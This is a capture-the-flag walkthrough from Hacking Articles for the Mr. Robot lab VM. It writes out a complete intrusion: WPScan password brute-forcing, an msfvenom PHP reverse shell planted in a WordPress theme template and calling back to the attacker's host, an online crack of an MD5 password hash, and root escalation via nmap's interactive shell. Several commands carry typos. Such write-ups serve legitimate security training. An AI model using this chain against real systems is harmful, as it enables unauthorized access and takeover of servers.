This is our another article of root2boot penetration testing challenge. We will walk through a exploitable framework Mr. Robot. It is based on the TV show, Mr. Robot, it has three keys hidden in different locations. The main goal is to find all three tokens hidden in the system. Each key is progressively difficult to find. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.
First Download the Mr Robot Lab from here
First of all we have to find its IP address and for that go to the terminal of your Kali and type :
netdiscover
Upon the execution of the above command we will know about all the IP addresses in our network. Our target IP is 192.168.0.102, let us scan it.
To scan our target IP we will use aggressive scan(-A)
nmap -A 192.168.0.102
The scan’s result shows us the open ports are : 22, 80, 443. As the 80 port is open we can try and open this IP in our browser.
And yes, it opens which further confirms our target.
Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type :
nitko -h 192.168.0.102
From the result we can gather that there a text file with the name of robots.txt which might provide us with some further information. So now let us try and open this file in the browser
Opened the key-1-of-3.txt file from the browser and I also had the first of the 3 keys mentioned in the readme.
Now open fsocity.dic file in browser which is a dictionary file. Let us first try and open this dictionary file the browser.
Once we open the said dictionary file in the browser, it asks us to download it. Going ahead we downloaded and opened it. It is a file which may contains username and passwords.
So now that we know we might have username and passwords, we will try and logon into our target. One by one we have tried every username and it has given the error that the username doesn’t exist. But when we used the name elliot it gave us the error that the password is incorrect.
With this we know one thing for sure that elliot is a correct username and now we just have to find a password for it.
Our best guess to find the password the same dictionary file from which we found the username. Thus, moving forward we will use WPScan to find our password from the same file. For this open WPScan in the terminal of Kali and type :
ruby ./wpscan.rb –url http://192.168.0.102 –wordlist /root/Desktop/fsocity.dic –username elliot
Here,
./wpscan.rb –> starts the WPScan
–url –> denotes the URL onn which WPScan will work
http://192.168.0.102 –> is our URL
–wordlist –> denotes the path of the dictionary file
–username –> denotes username
elliot –> username
Once the command starts working it will take its time to execute as the dictionary file we got is huge. So, sit back and relax and let the WPScan do its work.
When the execution is completed (which may time much time as in our case it took almost 4 hours) you will have the password for the username elliot which is ER28-0652.
Using the password, logon in to the target.
One you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command :
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw
Copy the code from <?php to die(); and paste it on template(and save it)
Now you have access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the msfvenom generated shell
And simultaneously open metasploit and type :
Use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit
Once the exploit is executed, open the path of the template in the browser as shown :
Browsing to http://192.168.0.102/wp-content/themes/twentyfifteen/404.php and press enter
Once you open the template path in the browser then you will have a meterpreter session and once you have it, go to the shell and type :
echo import pty; pty.spwan(‘ /bin/bash’)” > /tmp/asdf.py
python /tmp/asdf.py
After doing the above, you will enter a user of our target and to know all the information about the user type :
ls -lsa (gives us the information about the user we just entered)
cd home (take us in the folder home)
ls -lsa (gives the information about the home folder0
cd robot (takes us into the robot folder)
Now, to know the information about the robot folder/file we will type :
ls -lsa
We now know that there are two important files, one of them is a text file other is password in the form of MD5. If we try to open the text file by typing :
cat key-2-of-3.txt
It will not open as we do not have the permission to do so. But now let us try and open the MD5 file and for that type :
cat password.raw-md5
Executing the above command will give a MD5 value(hash value) of the password as you can see below :
We will use md5cracker.org (online md5 value cracker) to crack this MD5 value. Enter the MD5 value in to the text box and click on crack/encrypt button
The value will translate to abcdefghijklmnopqrstuvwxyz as shown below
Now in the terminal try to switch the user to robot by the command :
su robot
Following the command it will ask you for the password. Enter the MD5 cracked password here and you will enter the robot user and to gain its information type :
ls -lsa
Now, try to open the remaining text file by typing :
cat key-2-of-3.txt
here i will read the second key file
Next type the following :
nmap
Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using a nmap “shell” (interactive shell).
nmap –interactive
With the above commands you will enter nmap then type :
!sh
id (to know the users)
cd /root (lets you to enter root)
Once you have enetered the root, type :
ls -lsa
cat key-3-of-3.txt
And upon the execution of we will obtain 3 of 3 keys, hence entering Mr. Robot. There are many ways to perform the above but this methods is the easiest. We hope you find it effective and interesting and it helps you to improve.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
The post Hack the Mr. Robot VM (CTF Challenge) appeared first on Hacking Articles.